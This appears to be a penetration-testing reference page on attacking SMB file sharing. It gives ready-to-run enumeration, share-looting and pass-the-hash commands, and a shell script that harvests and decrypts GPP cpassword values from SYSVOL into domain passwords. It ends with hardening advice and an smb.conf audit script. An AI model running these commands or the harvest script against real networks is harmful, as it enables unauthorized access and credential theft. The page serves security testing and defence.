FILE SHARE 139/tcp 445/tcp

SMB

aka Samba, CIFS, netbios-ssn

Windows/Samba file sharing on 139/445. Null and guest sessions enumerate shares and users; readable shares leak credentials; classic RCE CVEs and pass-the-hash live here.

Ports

Port  Proto  Notes
139   tcp    NetBIOS session service (SMB over NetBIOS)
445   tcp    SMB directly over TCP

Fingerprint

  • nmap smb-os-discovery / smb2-security-mode
  • Domain and hostname leak via the SMB negotiate

Key files

Path                     Holds                                          Sensitive
\\SYSVOL\...\Groups.xml  GPP cpassword (AES key is public)              sensitive
/etc/samba/smb.conf      Samba config and share definitions (Linux)
non-default shares       scripts, backups and configs that leak creds   sensitive

Default / weak creds

  • guest / (empty) and null session

Known CVEs

CVE            Impact
MS17-010       EternalBlue: unauthenticated SMBv1 remote code execution (wormable)
CVE-2020-1472  Zerologon: Netlogon authentication bypass, domain controller takeover
CVE-2020-0796  SMBGhost: SMBv3.1.1 compression bug, pre-auth remote code execution (wormable)

Exploitation primitives

  • Null/guest session: enumerate shares, users and password policy (nxc, enum4linux-ng, smbclient)
  • Loot readable shares for creds/configs; GPP cpassword in SYSVOL decrypts to a domain password
  • Pass-the-hash and writable-share payload drops; RID cycling to enumerate users

Overview

SMB on 445 is one of the first things to test on Windows targets. Even without credentials, guest or null access often lists shares and users, and a single readable non-default share frequently hands over a password.

Enumeration

Guest session, list shares:

nxc smb <TARGET> -u 'guest' -p '' --shares

Null session, enumerate users:

nxc smb <TARGET> -u '' -p '' --users

List shares with smbclient:

smbclient -L //<TARGET> -U 'guest%'

Full automated enumeration:

enum4linux-ng -A <TARGET>

Connect to a share and pull files:

smbclient //<TARGET>/share -U 'user%pass'

Recursively mirror a share to loot offline:

smbclient //<TARGET>/share -U 'user%pass' -c 'recurse ON; prompt OFF; mget *'

GPP cpassword (SYSVOL)

Find the AES-encrypted cpassword in SYSVOL Groups.xml:

nxc smb <TARGET> -u user -p pass -M gpp_password

Decrypt a recovered cpassword blob (the AES key is public):

gpp-decrypt 'VPe/o9YRyz2cQjudVbF4xRcWZ4l1bnZ9q2cBKAZ4kZ4'
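Putting the mirror step and the decrypt step together: the script below is an added example, not code from the page, from NetExec or from gpp-decrypt. It walks a SYSVOL tree mirrored with the smbclient mget above, pulls every cpassword out of the six preference files that can carry one (Groups, Services, ScheduledTasks, DataSources, Drives, Printers), and decrypts it with the AES-256 key Microsoft published in MS-GPPREF. It assumes openssl, base64 and iconv are on PATH and that each Properties element sits on one line, which is how Group Policy writes these files; the gpp_encrypt helper exists only to build test data.

```shell
# Added example: harvest and decrypt GPP cpassword values from a mirrored SYSVOL.
# Assumes openssl, base64 and iconv on PATH. Key: the 32-byte AES-256 key published in
# MS-GPPREF (this is why the page says the key is public); IV: 16 zero bytes;
# plaintext: UTF-16LE with PKCS#7 padding.
GPP_KEY='4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'
GPP_IV='00000000000000000000000000000000'

# Group Policy strips the '=' padding from the base64 blob; restore it for base64 -d.
gpp_pad() {
    s=$1
    while [ $(( ${#s} % 4 )) -ne 0 ]; do s="${s}="; done
    printf '%s' "$s"
}

# cpassword blob -> cleartext, the same operation gpp-decrypt performs.
gpp_decrypt() {
    gpp_pad "$1" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
        | iconv -f UTF-16LE -t UTF-8
}

# Inverse of gpp_decrypt (same key, same IV); only used to build test fixtures.
gpp_encrypt() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE \
        | openssl enc -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
        | base64 | tr -d '=\n'
}

# Walk a mirrored SYSVOL tree and print  file:account:cleartext  for every cpassword.
# The six file names are the preference types that can carry a cpassword; the account
# attribute differs per type (userName, accountName, runAs, username).
gpp_harvest() {
    find "$1" -type f \( -iname Groups.xml -o -iname Services.xml -o -iname ScheduledTasks.xml \
                         -o -iname DataSources.xml -o -iname Drives.xml -o -iname Printers.xml \) \
    | while IFS= read -r f; do
        grep 'cpassword="' "$f" | while IFS= read -r line; do
            blob=$(printf '%s' "$line" | grep -o 'cpassword="[^"]*"' | head -n 1 | cut -d'"' -f2)
            [ -n "$blob" ] || continue        # cpassword="" : the item stores no password
            acct=$(printf '%s' "$line" | grep -oE '(userName|accountName|runAs|username)="[^"]*"' \
                   | head -n 1 | cut -d'"' -f2)
            printf '%s:%s:%s\n' "$f" "${acct:-?}" "$(gpp_decrypt "$blob")"
        done
    done
}
```

Usage: `gpp_harvest ./sysvol-loot` after mirroring the SYSVOL share into `./sysvol-loot`; a single blob can be handed to `gpp_decrypt` directly. The decrypted value is a domain account password, so the account attribute matters as much as the cleartext.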

Notes

  • Any share outside the defaults (ADMIN$, C$, IPC$, NETLOGON, SYSVOL, PRINT$) is worth a look; check for write access too, since a writable share is a payload drop point.
  • With an NT hash, nxc smb <TARGET> -u user -H <hash> for pass-the-hash.

Hardening

Disable guest and null sessions, require SMB signing, disable SMBv1, and patch MS17-010 and SMBGhost (both wormable) on every host and Zerologon on domain controllers.
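The Samba side of that advice, as an added example that is not from the page or the Samba project: a shell function that reads an smb.conf and flags the settings behind each point. Parameter names and values are Samba's documented ones; the defaults quoted in the messages are those of Samba 4.x, and the SMBv1 note applies to versions before 4.11, where `server min protocol` defaulted to NT1.

```shell
# Added example: flag the smb.conf settings that leave guest/null access, unsigned SMB
# or SMBv1 enabled. "WEAK" is an explicit bad value; "CHECK" is a setting that is not
# present, where the effective default depends on Samba version or server role.
smb_conf_audit() {
    awk '
        /^[ \t]*[;#]/ { next }                                   # comment line
        /^[ \t]*\[/ { sect = tolower($0); gsub(/^[ \t]*\[|\][ \t]*$/, "", sect); next }
        /=/ {
            key = $0; sub(/=.*/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", key); key = tolower(key)
            val = $0; sub(/^[^=]*=/, "", val); gsub(/^[ \t]+|[ \t]+$/, "", val); val = tolower(val)
            if (sect == "global") g[key] = val
            else if (key == "guest ok" && val == "yes")
                print "WEAK  [" sect "] guest ok = yes (guest-readable share)"
        }
        END {
            # map to guest: default is Never, so only an explicit other value is weak
            if (("map to guest" in g) && g["map to guest"] != "never")
                print "WEAK  map to guest = " g["map to guest"] " (want: never, the default)"
            # restrict anonymous: default 0 allows null sessions; 2 blocks them on IPC$
            if (!("restrict anonymous" in g))
                print "CHECK restrict anonymous not set (default 0 allows null sessions; want 2)"
            else if (g["restrict anonymous"] != "2")
                print "WEAK  restrict anonymous = " g["restrict anonymous"] " (want: 2; blocks null sessions to IPC$)"
            # server signing: mandatory by default only when the server role is AD DC
            if (!("server signing" in g))
                print "CHECK server signing not set (mandatory by default only on an AD DC; want mandatory)"
            else if (g["server signing"] != "mandatory")
                print "WEAK  server signing = " g["server signing"] " (want: mandatory)"
            # server min protocol: NT1 is SMBv1; Samba before 4.11 defaulted to NT1
            if (!("server min protocol" in g))
                print "CHECK server min protocol not set (SMBv1 allowed on Samba before 4.11; want SMB2 or higher)"
            else if (g["server min protocol"] == "nt1")
                print "WEAK  server min protocol = nt1 (SMBv1; want SMB2 or higher)"
        }
    ' "$1"
}
```

Usage: `smb_conf_audit /etc/samba/smb.conf`; to see the effective configuration with includes resolved, save `testparm -s` output to a file and audit that. Empty output means none of the checked settings is weak or missing.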
